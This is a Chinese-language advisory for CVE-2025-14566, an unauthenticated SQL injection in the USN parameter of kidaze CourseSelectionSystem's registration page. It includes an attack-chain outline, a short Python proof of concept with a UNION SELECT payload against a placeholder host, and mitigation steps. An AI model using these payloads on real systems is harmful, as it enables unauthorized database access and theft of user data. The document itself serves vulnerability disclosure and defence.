CVE-2025-14566 kidaze课程选择系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-14566

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

kidaze CourseSelectionSystem

漏洞概述

CVE-2025-14566是kidaze课程选择系统（CourseSelectionSystem）中的一个高危SQL注入漏洞。该漏洞存在于/Profilers/SProfile/reg.php文件的USN参数中，攻击者可以通过构造恶意SQL语句实现未授权数据库访问。漏洞CVSS评分7.3，属于高危级别，攻击向量为网络远程攻击，无需认证和用户交互即可利用。漏洞影响版本至commit 42cd892b40a18d50bd4ed1905fa89f939173a464。攻击者利用此漏洞可窃取数据库中的敏感信息，包括用户账户、密码哈希、课程数据、个人信息等。漏洞已于2025年12月12日公开披露， exploits已发布到公开领域，存在被恶意利用的风险。建议受影响用户尽快采取修复措施或临时缓解方案。

技术细节

该SQL注入漏洞位于kidaze CourseSelectionSystem的注册模块/Profilers/SProfile/reg.php文件中，具体参数为USN（用户序列号）。漏洞成因是应用程序未对用户输入进行充分的参数化查询或输入过滤，直接将USN参数拼接到SQL查询语句中。攻击者可通过构造特殊的USN参数值，如包含SQL元字符和命令的字符串，实现SQL注入攻击。成功利用后，攻击者可执行以下操作：1）通过UNION SELECT提取数据库中其他表的数据；2）通过布尔盲注或时间盲注推断数据库内容；3）修改或删除数据库记录；4）在某些配置下可能实现操作系统命令执行。由于攻击无需认证且可通过网络远程发起，漏洞利用门槛较低，对系统安全构成严重威胁。

攻击链分析

STEP 1

1

侦察阶段：攻击者识别目标系统为kidaze CourseSelectionSystem，定位漏洞文件为/Profilers/SProfile/reg.php

STEP 2

2

探测阶段：攻击者测试USN参数是否存在SQL注入漏洞，发送畸形输入观察数据库错误响应

STEP 3

3

利用阶段：通过UNION注入、布尔盲注或时间盲注技术，构造恶意SQL语句提取数据库数据

STEP 4

4

数据窃取：获取用户账户、密码哈希、课程信息等敏感数据

STEP 5

5

持久化控制：可能通过写入webshell或创建后门账户实现长期控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14566 SQL Injection PoC
# Target: kidaze CourseSelectionSystem /Profilers/SProfile/reg.php
# Parameter: USN

def exploit_sqli(target_url, payload):
    """
    SQL Injection exploit for CVE-2025-14566
    Extract database version information
    """
    params = {
        'USN': payload
    }
    
    try:
        response = requests.get(target_url, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {e}"

# Basic injection test - extract database version
target = "http://target.com/Profilers/SProfile/reg.php"
payload = "' UNION SELECT NULL,version(),NULL-- -"

print("[*] Testing CVE-2025-14566 SQL Injection")
print(f"[*] Target: {target}")
print(f"[*] Payload: {payload}")

result = exploit_sqli(target, payload)
print(f"[+] Result: {result[:500]}")

# Blind boolean-based injection for data extraction
def blind_sqli(target_url, param_name, injection):
    params = {param_name: injection}
    response = requests.get(target_url, params=params)
    return response.status_code == 200 and 'expected_condition' in response.text

# Example: Extract current user
payload_user = "' AND 1=1-- -"
print(f"[*] Extracting database user...")

影响范围

kidaze CourseSelectionSystem <= 42cd892b40a18d50bd4ed1905fa89f939173a464

防御指南

临时缓解措施

在正式补丁发布前，可采取以下临时缓解措施：1）通过Web服务器配置（如nginx/Apache规则）限制对/Profilers/SProfile/reg.php的直接访问；2）使用输入验证中间件对USN参数进行过滤，拦截SQL注入特征字符（如单引号、双破折号、UNION等）；3）临时关闭注册功能；4）启用数据库查询日志监控，及时发现异常SQL行为；5）限制数据库账户权限，防止数据泄露后的进一步破坏。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14566
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14566
3 Details https://www.cvedetails.com/cve/CVE-2025-14566/
4 VulDB https://vuldb.com/cve/CVE-2025-14566
5 Link https://github.com/Anti1i/cve/issues/2
6 Link https://vuldb.com/?ctiid.336190
7 Link https://vuldb.com/?id.336190
8 Link https://vuldb.com/?submit.703876
9 Link https://vuldb.com/?submit.704951